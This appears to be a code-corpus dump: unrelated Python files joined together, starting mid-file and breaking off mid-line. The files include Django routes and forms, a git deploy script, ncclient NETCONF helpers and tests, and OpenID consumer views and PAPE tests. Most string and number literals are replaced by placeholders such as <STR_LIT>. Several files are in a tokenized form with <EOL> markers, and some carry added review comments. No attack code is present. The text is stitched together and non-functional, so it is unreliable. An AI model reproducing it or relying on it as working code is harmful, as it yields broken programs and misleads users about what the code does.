    # NOTE(review): unreachable — every branch above returns.
    raise Http404
from __init__ import message, CRITICAL
import sys


def importETree():
    """Locate and return the best available ElementTree implementation.

    Tries, in order: the stdlib C accelerator, the stdlib pure-Python
    module, the standalone cElementTree package, and finally the
    standalone elementtree package.  Exits the process with status 1 if
    none can be imported or the found version is too old.
    """
    etree_in_c = None
    try:
        import xml.etree.cElementTree as etree_in_c
    except ImportError:
        try:
            import xml.etree.ElementTree as etree
        except ImportError:
            try:
                import cElementTree as etree_in_c
            except ImportError:
                try:
                    import elementtree.ElementTree as etree
                except ImportError:
                    # No implementation available at all: fatal.
                    message(CRITICAL, "<STR_LIT>")
                    sys.exit(<NUM_LIT:1>)
    # Reject C implementations older than 1.0.
    if etree_in_c and etree_in_c.VERSION < "<STR_LIT:1.0>":
        message(CRITICAL, "<STR_LIT>")
        sys.exit(<NUM_LIT:1>)
    elif etree_in_c:
        return etree_in_c
    # Only reached when a pure-Python ``etree`` was imported above, so
    # the name is guaranteed to be bound here.
    elif etree.VERSION < "<STR_LIT>":
        message(CRITICAL, "<STR_LIT>")
        sys.exit(<NUM_LIT:1>)
    else:
        return etree
class BaseRepository(object):
    """Abstract interface for version-control repository back-ends.

    Concrete subclasses override the four query hooks below; the base
    implementations all raise NotImplementedError.
    """

    def __init__(self, path, **kwargs):
        """Remember the repository *path*; any extra keyword options are
        stashed unmodified in ``self.extra``."""
        self.path = path
        self.extra = kwargs

    def get_commit_by_id(self, commit_id):
        """Return the single commit identified by *commit_id* (hook)."""
        raise NotImplementedError

    def get_recent_commits(self, since=None):
        """Return commits newer than *since*, or all recent ones (hook)."""
        raise NotImplementedError

    def list_directory(self, path, revision=None):
        """List the entries of *path* at *revision* (hook)."""
        raise NotImplementedError

    def file_contents(self, path, revision=None):
        """Return the contents of *path* at *revision* (hook)."""
        raise NotImplementedError
<s> """<STR_LIT>""" </s>
from django.conf.urls import *

# URL routes for this app.  patterns() takes a view-prefix string
# followed by url(regex, view, name) entries; views are referenced by
# dotted string path (old-style Django).
urlpatterns = patterns('<STR_LIT>',
    url(r'<STR_LIT>',
        view='<STR_LIT>',
        name='<STR_LIT>'
    ),
    url(r'<STR_LIT>',
        view='<STR_LIT>',
        name='<STR_LIT>'
    ),
    url(r'<STR_LIT>',
        view='<STR_LIT>',
        name='<STR_LIT>'
    ),
)
from django import forms
from django.contrib.auth.models import User

from basic.messages.models import Message


class MessageForm(forms.ModelForm):
    """Form for composing a Message; the recipient is entered as a
    username and resolved to a User during cleaning."""

    # Free-text username of the recipient (resolved in clean_to_user).
    to_user = forms.CharField()

    class Meta:
        model = Message
        exclude = ('<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>')

    def clean_to_user(self):
        """Resolve the entered username to a User instance.

        Replaces the cleaned string with the User object on success;
        raises ValidationError when empty or no such user exists.
        """
        if self.cleaned_data['<STR_LIT>']:
            try:
                user = User.objects.get(username=self.cleaned_data['<STR_LIT>'])
                self.cleaned_data['<STR_LIT>'] = user
                return self.cleaned_data['<STR_LIT>']
            except User.DoesNotExist:
                # Fall through to the common error below.
                pass
        raise forms.ValidationError(u'<STR_LIT>')
from django.conf.urls import *

# Regex fragment matching a username, interpolated into a route below.
USERNAME = r'<STR_LIT>'

# Old-style Django routes: view-prefix string followed by url() entries
# referencing views by dotted string path.
urlpatterns = patterns('<STR_LIT>',
    url(r'<STR_LIT>',
        view='<STR_LIT>',
        name='<STR_LIT>',
    ),
    url(r'<STR_LIT>' % USERNAME,
        view='<STR_LIT>',
        name='<STR_LIT>',
    ),
    url(r'<STR_LIT>',
        view='<STR_LIT>',
        name='<STR_LIT>',
    ),
)
<s> """<STR_LIT>""" <EOL> from django . conf . urls . defaults import * <EOL> from django . views . generic . simple import direct_to_template <EOL> from registration . views import activate <EOL> from registration . views import register <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , <EOL> register , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> direct_to_template , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> name = '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> ) </s>
from setuptools import setup, find_packages

# Read the long description up front inside a ``with`` block so the file
# handle is closed promptly (the original passed open(...).read() inline,
# leaking the handle until garbage collection).
with open('<STR_LIT>') as readme:
    long_description = readme.read()

setup(
    name='<STR_LIT>',
    version='<STR_LIT>',
    packages=find_packages(),
    install_requires=['<STR_LIT>', ],
    license='<STR_LIT>',
    author='<STR_LIT>',
    author_email='<STR_LIT>',
    url='<STR_LIT>',
    description='<STR_LIT>',
    long_description=long_description,
)
<s> """<STR_LIT>""" <EOL> from os import getenv , chdir <EOL> from re import sub <EOL> from subprocess import check_output , check_call <EOL> from tempfile import mkdtemp <EOL> from shutil import rmtree <EOL> if getenv ( '<STR_LIT>' ) != '<STR_LIT>' : <EOL> print "<STR_LIT>" <EOL> exit ( ) <EOL> if getenv ( '<STR_LIT>' ) != '<STR_LIT>' : <EOL> print "<STR_LIT>" <EOL> exit ( ) <EOL> if getenv ( '<STR_LIT>' ) != '<STR_LIT:false>' : <EOL> print "<STR_LIT>" <EOL> exit ( ) <EOL> repo = check_output ( "<STR_LIT>" , shell = True ) <EOL> repo = sub ( r'<STR_LIT>' , '<STR_LIT>' , repo ) . strip ( ) <EOL> deploy_url = sub ( r'<STR_LIT>' , '<STR_LIT>' % getenv ( '<STR_LIT>' ) , repo ) <EOL> deploy_branch = '<STR_LIT>' <EOL> rev = check_output ( "<STR_LIT>" , shell = True ) . strip ( ) <EOL> dir = mkdtemp ( ) <EOL> check_call ( "<STR_LIT>" % ( deploy_branch , repo , dir ) , shell = True ) <EOL> chdir ( dir ) <EOL> check_call ( "<STR_LIT>" , shell = True ) <EOL> print "<STR_LIT>" <EOL> check_call ( "<STR_LIT>" % getenv ( '<STR_LIT>' ) , shell = True ) <EOL> check_call ( "<STR_LIT>" % getenv ( '<STR_LIT>' ) , shell = True ) <EOL> check_call ( "<STR_LIT>" % rev , shell = True ) <EOL> check_call ( "<STR_LIT>" % ( deploy_url , deploy_branch ) , shell = True ) <EOL> chdir ( getenv ( '<STR_LIT>' ) ) <EOL> rmtree ( dir ) <EOL> print "<STR_LIT>" </s>
from robotpageobjects import Page


class StackTracePage(Page):
    """Page object used to exercise stack-trace reporting: its single
    keyword deliberately raises an exception."""

    uri = "<STR_LIT>"

    def raise_division_by_zero(self):
        # Intentionally raises ZeroDivisionError; the trailing return is
        # never reached (kept for the page-object chaining convention).
        <NUM_LIT:1> / <NUM_LIT:0>
        return self
import unittest

from po.loggingpage import LoggingPage


class LoggingTestCase(unittest.TestCase):
    """Exercises LoggingPage's logging helpers."""

    def setUp(self):
        # Fresh page object for each test.
        self.p = LoggingPage()

    def test_log_to_file_and_screen(self):
        # Emit a warning; success is simply "no exception raised".
        self.p.log_warning("<STR_LIT>")


if __name__ == '__main__':
    # BUG FIX: the original invoked unittest.main() unconditionally at
    # module level, which ran (and then sys.exit-ed) the test runner on
    # a mere import of this module; guard it behind __main__.
    unittest.main()
from ncclient import manager


def connect(host, port, user):
    """Open a NETCONF session to a Junos device and print one field of
    its software information.

    Host-key verification is disabled, so this is only suitable for
    trusted/lab environments.
    """
    conn = manager.connect(host=host,
                           port=port,
                           username=user,
                           timeout=<NUM_LIT:10>,
                           device_params={'<STR_LIT:name>': '<STR_LIT>'},
                           hostkey_verify=False)
    # Junos-specific RPC; print the first matching node's text.
    result = conn.get_software_information('<STR_LIT>', test='<STR_LIT>')
    print '<STR_LIT>', result.xpath('<STR_LIT>')[<NUM_LIT:0>].text


if __name__ == '<STR_LIT:__main__>':
    connect('<STR_LIT>', <NUM_LIT>, '<STR_LIT>')
from ncclient import NCClientError


class OperationError(NCClientError):
    """Raised when a NETCONF operation fails."""
    pass


class TimeoutExpiredError(NCClientError):
    """Raised when an operation does not complete within its timeout."""
    pass


class MissingCapabilityError(NCClientError):
    """Raised when the peer lacks a capability an operation requires."""
    pass
from ncclient.operations.lock import *
import unittest
from mock import patch
from ncclient import manager
import ncclient.manager
import ncclient.transport
from ncclient.xml_ import *
from ncclient.operations import RaiseMode
from xml.etree import ElementTree


class TestLock(unittest.TestCase):
    """Verify the XML emitted by the Lock/Unlock operations and the
    LockContext context manager.

    Each test patches the session layer, triggers a request, rebuilds
    the expected element tree by hand, and compares the serialised XML
    of the first mocked request call against it.
    """

    def setUp(self):
        # Device handler for the profile under test (name token elided).
        self.device_handler = manager.make_device_handler({'<STR_LIT:name>': '<STR_LIT>'})

    @patch('<STR_LIT>')
    @patch('<STR_LIT>')
    def test_lock_default_param(self, mock_request, mock_session):
        # request() with no arguments should target the default datastore.
        session = ncclient.transport.SSHSession(self.device_handler)
        obj = Lock(session, self.device_handler, raise_mode=RaiseMode.ALL)
        obj.request()
        # Expected payload: <lock><target><datastore/></target></lock>.
        node = new_ele("<STR_LIT>")
        sub_ele(sub_ele(node, "<STR_LIT:target>"), "<STR_LIT>")
        xml = ElementTree.tostring(node, method='<STR_LIT>')
        # First positional arg of the first mocked request call.
        call = mock_request.call_args_list[<NUM_LIT:0>][<NUM_LIT:0>][<NUM_LIT:0>]
        call = ElementTree.tostring(call, method='<STR_LIT>')
        self.assertEqual(call, xml)

    @patch('<STR_LIT>')
    @patch('<STR_LIT>')
    def test_lock(self, mock_request, mock_session):
        # request() with an explicit target datastore.
        session = ncclient.transport.SSHSession(self.device_handler)
        obj = Lock(session, self.device_handler, raise_mode=RaiseMode.ALL)
        obj.request(target="<STR_LIT>")
        node = new_ele("<STR_LIT>")
        sub_ele(sub_ele(node, "<STR_LIT:target>"), "<STR_LIT>")
        xml = ElementTree.tostring(node, method='<STR_LIT>')
        call = mock_request.call_args_list[<NUM_LIT:0>][<NUM_LIT:0>][<NUM_LIT:0>]
        call = ElementTree.tostring(call, method='<STR_LIT>')
        self.assertEqual(call, xml)

    @patch('<STR_LIT>')
    @patch('<STR_LIT>')
    def test_unlock_default_param(self, mock_request, mock_session):
        # Unlock with no arguments mirrors the default lock test above.
        session = ncclient.transport.SSHSession(self.device_handler)
        obj = Unlock(session, self.device_handler, raise_mode=RaiseMode.ALL)
        obj.request()
        node = new_ele("<STR_LIT>")
        sub_ele(sub_ele(node, "<STR_LIT:target>"), "<STR_LIT>")
        xml = ElementTree.tostring(node, method='<STR_LIT>')
        call = mock_request.call_args_list[<NUM_LIT:0>][<NUM_LIT:0>][<NUM_LIT:0>]
        call = ElementTree.tostring(call, method='<STR_LIT>')
        self.assertEqual(call, xml)

    @patch('<STR_LIT>')
    @patch('<STR_LIT>')
    def test_unlock(self, mock_request, mock_session):
        # Unlock with an explicit target datastore.
        session = ncclient.transport.SSHSession(self.device_handler)
        obj = Unlock(session, self.device_handler, raise_mode=RaiseMode.ALL)
        obj.request(target="<STR_LIT>")
        node = new_ele("<STR_LIT>")
        sub_ele(sub_ele(node, "<STR_LIT:target>"), "<STR_LIT>")
        xml = ElementTree.tostring(node, method='<STR_LIT>')
        call = mock_request.call_args_list[<NUM_LIT:0>][<NUM_LIT:0>][<NUM_LIT:0>]
        call = ElementTree.tostring(call, method='<STR_LIT>')
        self.assertEqual(call, xml)

    @patch('<STR_LIT>')
    @patch('<STR_LIT>')
    def test_lock_context_enter(self, mock_request, mock_session):
        # Entering the context must send a lock request and return self.
        session = ncclient.transport.SSHSession(self.device_handler)
        obj = LockContext(session, self.device_handler, "<STR_LIT>")
        self.assertEqual(obj.__enter__(), obj)
        node = new_ele("<STR_LIT>")
        sub_ele(sub_ele(node, "<STR_LIT:target>"), "<STR_LIT>")
        xml = ElementTree.tostring(node, method='<STR_LIT>')
        call = mock_request.call_args_list[<NUM_LIT:0>][<NUM_LIT:0>][<NUM_LIT:0>]
        call = ElementTree.tostring(call, method='<STR_LIT>')
        self.assertEqual(call, xml)

    @patch('<STR_LIT>')
    @patch('<STR_LIT>')
    def test_lock_context_exit(self, mock_request, mock_session):
        # Exiting the context must send an unlock and not suppress
        # exceptions (__exit__ returns a falsy value).
        session = ncclient.transport.SSHSession(self.device_handler)
        obj = LockContext(session, self.device_handler, "<STR_LIT>")
        self.assertFalse(obj.__exit__())
        node = new_ele("<STR_LIT>")
        sub_ele(sub_ele(node, "<STR_LIT:target>"), "<STR_LIT>")
        xml = ElementTree.tostring(node, method='<STR_LIT>')
        call = mock_request.call_args_list[<NUM_LIT:0>][<NUM_LIT:0>][<NUM_LIT:0>]
        call = ElementTree.tostring(call, method='<STR_LIT>')
        self.assertEqual(call, xml)
<s> import compileall <EOL> import os <EOL> import pep8 <EOL> import yaml <EOL> FLINTROCK_ROOT_DIR = ( <EOL> os . path . dirname ( <EOL> os . path . dirname ( <EOL> os . path . realpath ( __file__ ) ) ) ) <EOL> TEST_TARGETS = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> TEST_PATHS = [ <EOL> os . path . join ( FLINTROCK_ROOT_DIR , path ) for path in TEST_TARGETS ] <EOL> def test_code_compiles ( ) : <EOL> for path in TEST_PATHS : <EOL> if os . path . isdir ( path ) : <EOL> result = compileall . compile_dir ( path ) <EOL> else : <EOL> result = compileall . compile_file ( path ) <EOL> assert result == <NUM_LIT:1> <EOL> def test_pep8_compliance ( ) : <EOL> style = pep8 . StyleGuide ( <EOL> config_file = os . path . join ( FLINTROCK_ROOT_DIR , '<STR_LIT>' ) ) <EOL> result = style . check_files ( TEST_PATHS ) <EOL> assert result . total_errors == <NUM_LIT:0> <EOL> def test_config_template_is_valid ( ) : <EOL> config_template = os . path . join ( FLINTROCK_ROOT_DIR , '<STR_LIT>' , '<STR_LIT>' ) <EOL> with open ( config_template ) as f : <EOL> yaml . safe_load ( f ) </s>
<s> from django import http <EOL> from django . http import HttpResponseRedirect <EOL> from django . views . generic . base import TemplateView <EOL> from openid . consumer import consumer <EOL> from openid . consumer . discover import DiscoveryFailure <EOL> from openid . extensions import ax , pape , sreg <EOL> from openid . yadis . constants import YADIS_HEADER_NAME , YADIS_CONTENT_TYPE <EOL> from openid . server . trustroot import RP_RETURN_TO_URL_TYPE <EOL> from djopenid import util <EOL> PAPE_POLICIES = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> POLICY_PAIRS = [ ( p , getattr ( pape , p ) ) <EOL> for p in PAPE_POLICIES ] <EOL> def getOpenIDStore ( ) : <EOL> """<STR_LIT>""" <EOL> return util . getOpenIDStore ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def getConsumer ( request ) : <EOL> """<STR_LIT>""" <EOL> return consumer . Consumer ( request . session , getOpenIDStore ( ) ) <EOL> def renderIndexPage ( request , ** template_args ) : <EOL> template_args [ '<STR_LIT>' ] = util . getViewURL ( request , startOpenID ) <EOL> template_args [ '<STR_LIT>' ] = POLICY_PAIRS <EOL> response = TemplateView ( <EOL> request , '<STR_LIT>' , template_args ) <EOL> response [ YADIS_HEADER_NAME ] = util . getViewURL ( request , rpXRDS ) <EOL> return response <EOL> def startOpenID ( request ) : <EOL> """<STR_LIT>""" <EOL> if request . POST : <EOL> openid_url = request . POST [ '<STR_LIT>' ] <EOL> c = getConsumer ( request ) <EOL> error = None <EOL> try : <EOL> auth_request = c . begin ( openid_url ) <EOL> except DiscoveryFailure as e : <EOL> error = "<STR_LIT>" % ( str ( e ) , ) <EOL> if error : <EOL> return renderIndexPage ( request , error = error ) <EOL> sreg_request = sreg . SRegRequest ( optional = [ '<STR_LIT:email>' , '<STR_LIT>' ] , <EOL> required = [ '<STR_LIT>' ] ) <EOL> auth_request . addExtension ( sreg_request ) <EOL> ax_request = ax . FetchRequest ( ) <EOL> ax_request . add ( <EOL> ax . 
AttrInfo ( '<STR_LIT>' , <EOL> required = True ) ) <EOL> ax_request . add ( <EOL> ax . AttrInfo ( '<STR_LIT>' , <EOL> required = False , count = ax . UNLIMITED_VALUES ) ) <EOL> auth_request . addExtension ( ax_request ) <EOL> requested_policies = [ ] <EOL> policy_prefix = '<STR_LIT>' <EOL> for k , v in request . POST . items ( ) : <EOL> if k . startswith ( policy_prefix ) : <EOL> policy_attr = k [ len ( policy_prefix ) : ] <EOL> if policy_attr in PAPE_POLICIES : <EOL> requested_policies . append ( getattr ( pape , policy_attr ) ) <EOL> if requested_policies : <EOL> pape_request = pape . Request ( requested_policies ) <EOL> auth_request . addExtension ( pape_request ) <EOL> trust_root = util . getViewURL ( request , startOpenID ) <EOL> return_to = util . getViewURL ( request , finishOpenID ) <EOL> if auth_request . shouldSendRedirect ( ) : <EOL> url = auth_request . redirectURL ( trust_root , return_to ) <EOL> return HttpResponseRedirect ( url ) <EOL> else : <EOL> form_id = '<STR_LIT>' <EOL> form_html = auth_request . formMarkup ( trust_root , return_to , <EOL> False , { '<STR_LIT:id>' : form_id } ) <EOL> return TemplateView ( <EOL> request , '<STR_LIT>' , { '<STR_LIT:html>' : form_html } ) <EOL> return renderIndexPage ( request ) <EOL> def finishOpenID ( request ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> request_args = util . normalDict ( request . GET ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> request_args . update ( util . normalDict ( request . POST ) ) <EOL> if request_args : <EOL> c = getConsumer ( request ) <EOL> return_to = util . getViewURL ( request , finishOpenID ) <EOL> response = c . complete ( request_args , return_to ) <EOL> sreg_response = { } <EOL> ax_items = { } <EOL> if response . status == consumer . SUCCESS : <EOL> sreg_response = sreg . SRegResponse . fromSuccessResponse ( response ) <EOL> ax_response = ax . FetchResponse . 
fromSuccessResponse ( response ) <EOL> if ax_response : <EOL> ax_items = { <EOL> '<STR_LIT>' : ax_response . get ( <EOL> '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ax_response . get ( <EOL> '<STR_LIT>' ) , <EOL> } <EOL> pape_response = None <EOL> if response . status == consumer . SUCCESS : <EOL> pape_response = pape . Response . fromSuccessResponse ( response ) <EOL> if not pape_response . auth_policies : <EOL> pape_response = None <EOL> results = { <EOL> consumer . CANCEL : <EOL> { '<STR_LIT:message>' : '<STR_LIT>' } , <EOL> consumer . FAILURE : <EOL> { '<STR_LIT:error>' : '<STR_LIT>' } , <EOL> consumer . SUCCESS : <EOL> { '<STR_LIT:url>' : response . getDisplayIdentifier ( ) , <EOL> '<STR_LIT>' : sreg_response and list ( sreg_response . items ( ) ) , <EOL> '<STR_LIT>' : list ( ax_items . items ( ) ) , <EOL> '<STR_LIT>' : pape_response } <EOL> } <EOL> result = results [ response . status ] <EOL> if isinstance ( response , consumer . FailureResponse ) : <EOL> result [ '<STR_LIT>' ] = response . message <EOL> return renderIndexPage ( request , ** result ) <EOL> def rpXRDS ( request ) : <EOL> """<STR_LIT>""" <EOL> return util . renderXRDS ( <EOL> request , <EOL> [ RP_RETURN_TO_URL_TYPE ] , <EOL> [ util . getViewURL ( request , finishOpenID ) ] ) </s>
<s> from openid . extensions . draft import pape5 as pape <EOL> from openid . message import * <EOL> from openid . server import server <EOL> import warnings <EOL> warnings . filterwarnings ( '<STR_LIT:ignore>' , module = __name__ , <EOL> message = '<STR_LIT>' ) <EOL> import unittest <EOL> class PapeRequestTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . req = pape . Request ( ) <EOL> def test_construct ( self ) : <EOL> self . assertEqual ( [ ] , self . req . preferred_auth_policies ) <EOL> self . assertEqual ( None , self . req . max_auth_age ) <EOL> self . assertEqual ( '<STR_LIT>' , self . req . ns_alias ) <EOL> self . assertFalse ( self . req . preferred_auth_level_types ) <EOL> bogus_levels = [ '<STR_LIT>' ] <EOL> req2 = pape . Request ( <EOL> [ pape . AUTH_MULTI_FACTOR ] , <NUM_LIT:1000> , bogus_levels ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR ] , <EOL> req2 . preferred_auth_policies ) <EOL> self . assertEqual ( <NUM_LIT:1000> , req2 . max_auth_age ) <EOL> self . assertEqual ( bogus_levels , req2 . preferred_auth_level_types ) <EOL> def test_addAuthLevel ( self ) : <EOL> self . req . addAuthLevel ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , <EOL> self . req . preferred_auth_level_types ) <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> self . req . auth_level_aliases [ '<STR_LIT>' ] ) <EOL> self . req . addAuthLevel ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> self . req . preferred_auth_level_types ) <EOL> self . req . addAuthLevel ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> self . req . preferred_auth_level_types ) <EOL> self . req . addAuthLevel ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> self . req . preferred_auth_level_types ) <EOL> self . assertRaises ( KeyError , <EOL> self . req . 
addAuthLevel , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> uri = '<STR_LIT>' <EOL> self . req . addAuthLevel ( uri ) <EOL> self . assertTrue ( uri in list ( self . req . auth_level_aliases . values ( ) ) ) <EOL> before_aliases = list ( self . req . auth_level_aliases . keys ( ) ) <EOL> self . req . addAuthLevel ( uri ) <EOL> after_aliases = list ( self . req . auth_level_aliases . keys ( ) ) <EOL> self . assertEqual ( before_aliases , after_aliases ) <EOL> def test_add_policy_uri ( self ) : <EOL> self . assertEqual ( [ ] , self . req . preferred_auth_policies ) <EOL> self . req . addPolicyURI ( pape . AUTH_MULTI_FACTOR ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR ] , <EOL> self . req . preferred_auth_policies ) <EOL> self . req . addPolicyURI ( pape . AUTH_MULTI_FACTOR ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR ] , <EOL> self . req . preferred_auth_policies ) <EOL> self . req . addPolicyURI ( pape . AUTH_PHISHING_RESISTANT ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR , <EOL> pape . AUTH_PHISHING_RESISTANT ] , <EOL> self . req . preferred_auth_policies ) <EOL> self . req . addPolicyURI ( pape . AUTH_MULTI_FACTOR ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR , <EOL> pape . AUTH_PHISHING_RESISTANT ] , <EOL> self . req . preferred_auth_policies ) <EOL> def test_getExtensionArgs ( self ) : <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' } , <EOL> self . req . getExtensionArgs ( ) ) <EOL> self . req . addPolicyURI ( '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> self . req . getExtensionArgs ( ) ) <EOL> self . req . addPolicyURI ( '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> self . req . getExtensionArgs ( ) ) <EOL> self . req . max_auth_age = <NUM_LIT> <EOL> self . assertEqual ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> self . req . 
getExtensionArgs ( ) ) <EOL> def test_getExtensionArgsWithAuthLevels ( self ) : <EOL> uri = '<STR_LIT>' <EOL> alias = '<STR_LIT>' <EOL> self . req . addAuthLevel ( uri , alias ) <EOL> uri2 = '<STR_LIT>' <EOL> alias2 = '<STR_LIT>' <EOL> self . req . addAuthLevel ( uri2 , alias2 ) <EOL> expected_args = { <EOL> ( '<STR_LIT>' % alias ) : uri , <EOL> ( '<STR_LIT>' % alias2 ) : uri2 , <EOL> '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( [ alias , alias2 ] ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> self . assertEqual ( expected_args , self . req . getExtensionArgs ( ) ) <EOL> def test_parseExtensionArgsWithAuthLevels ( self ) : <EOL> uri = '<STR_LIT>' <EOL> alias = '<STR_LIT>' <EOL> uri2 = '<STR_LIT>' <EOL> alias2 = '<STR_LIT>' <EOL> request_args = { <EOL> ( '<STR_LIT>' % alias ) : uri , <EOL> ( '<STR_LIT>' % alias2 ) : uri2 , <EOL> '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( [ alias , alias2 ] ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> self . req . parseExtensionArgs ( request_args , is_openid1 = False , strict = False ) <EOL> expected_auth_levels = [ uri , uri2 ] <EOL> self . assertEqual ( expected_auth_levels , <EOL> self . req . preferred_auth_level_types ) <EOL> self . assertEqual ( uri , self . req . auth_level_aliases [ alias ] ) <EOL> self . assertEqual ( uri2 , self . req . auth_level_aliases [ alias2 ] ) <EOL> def test_parseExtensionArgsWithAuthLevels_openID1 ( self ) : <EOL> request_args = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> expected_auth_levels = [ pape . LEVELS_NIST , pape . LEVELS_JISA ] <EOL> self . req . parseExtensionArgs ( request_args , is_openid1 = True ) <EOL> self . assertEqual ( expected_auth_levels , <EOL> self . req . preferred_auth_level_types ) <EOL> self . req = pape . Request ( ) <EOL> self . req . parseExtensionArgs ( request_args , is_openid1 = False ) <EOL> self . assertEqual ( [ ] , <EOL> self . req . preferred_auth_level_types ) <EOL> self . req = pape . Request ( ) <EOL> self . 
assertRaises ( ValueError , <EOL> self . req . parseExtensionArgs , <EOL> request_args , is_openid1 = False , strict = True ) <EOL> def test_parseExtensionArgs_ignoreBadAuthLevels ( self ) : <EOL> request_args = { '<STR_LIT>' : '<STR_LIT>' } <EOL> self . req . parseExtensionArgs ( request_args , False ) <EOL> self . assertEqual ( [ ] , self . req . preferred_auth_level_types ) <EOL> def test_parseExtensionArgs_strictBadAuthLevels ( self ) : <EOL> request_args = { '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assertRaises ( ValueError , self . req . parseExtensionArgs , <EOL> request_args , is_openid1 = False , strict = True ) <EOL> def test_parseExtensionArgs ( self ) : <EOL> args = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . req . parseExtensionArgs ( args , False ) <EOL> self . assertEqual ( <NUM_LIT:9> , self . req . max_auth_age ) <EOL> self . assertEqual ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> self . req . preferred_auth_policies ) <EOL> self . assertEqual ( [ ] , self . req . preferred_auth_level_types ) <EOL> def test_parseExtensionArgs_strict_bad_auth_age ( self ) : <EOL> args = { '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assertRaises ( ValueError , self . req . parseExtensionArgs , args , <EOL> is_openid1 = False , strict = True ) <EOL> def test_parseExtensionArgs_empty ( self ) : <EOL> self . req . parseExtensionArgs ( { } , False ) <EOL> self . assertEqual ( None , self . req . max_auth_age ) <EOL> self . assertEqual ( [ ] , self . req . preferred_auth_policies ) <EOL> self . assertEqual ( [ ] , self . req . preferred_auth_level_types ) <EOL> def test_fromOpenIDRequest ( self ) : <EOL> policy_uris = [ pape . AUTH_MULTI_FACTOR , pape . AUTH_PHISHING_RESISTANT ] <EOL> openid_req_msg = Message . fromOpenIDArgs ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : OPENID2_NS , <EOL> '<STR_LIT>' : pape . ns_uri , <EOL> '<STR_LIT>' : '<STR_LIT:U+0020>' . 
join ( policy_uris ) , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> oid_req = server . OpenIDRequest ( ) <EOL> oid_req . message = openid_req_msg <EOL> req = pape . Request . fromOpenIDRequest ( oid_req ) <EOL> self . assertEqual ( policy_uris , req . preferred_auth_policies ) <EOL> self . assertEqual ( <NUM_LIT> , req . max_auth_age ) <EOL> def test_fromOpenIDRequest_no_pape ( self ) : <EOL> message = Message ( ) <EOL> openid_req = server . OpenIDRequest ( ) <EOL> openid_req . message = message <EOL> pape_req = pape . Request . fromOpenIDRequest ( openid_req ) <EOL> assert ( pape_req is None ) <EOL> def test_preferred_types ( self ) : <EOL> self . req . addPolicyURI ( pape . AUTH_PHISHING_RESISTANT ) <EOL> self . req . addPolicyURI ( pape . AUTH_MULTI_FACTOR ) <EOL> pt = self . req . preferredTypes ( [ pape . AUTH_MULTI_FACTOR , <EOL> pape . AUTH_MULTI_FACTOR_PHYSICAL ] ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR ] , pt ) <EOL> class DummySuccessResponse : <EOL> def __init__ ( self , message , signed_stuff ) : <EOL> self . message = message <EOL> self . signed_stuff = signed_stuff <EOL> def isOpenID1 ( self ) : <EOL> return False <EOL> def getSignedNS ( self , ns_uri ) : <EOL> return self . signed_stuff <EOL> class PapeResponseTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . resp = pape . Response ( ) <EOL> def test_construct ( self ) : <EOL> self . assertEqual ( [ ] , self . resp . auth_policies ) <EOL> self . assertEqual ( None , self . resp . auth_time ) <EOL> self . assertEqual ( '<STR_LIT>' , self . resp . ns_alias ) <EOL> self . assertEqual ( None , self . resp . nist_auth_level ) <EOL> req2 = pape . Response ( [ pape . AUTH_MULTI_FACTOR ] , <EOL> "<STR_LIT>" , { pape . LEVELS_NIST : <NUM_LIT:3> } ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR ] , req2 . auth_policies ) <EOL> self . assertEqual ( "<STR_LIT>" , req2 . auth_time ) <EOL> self . assertEqual ( <NUM_LIT:3> , req2 . 
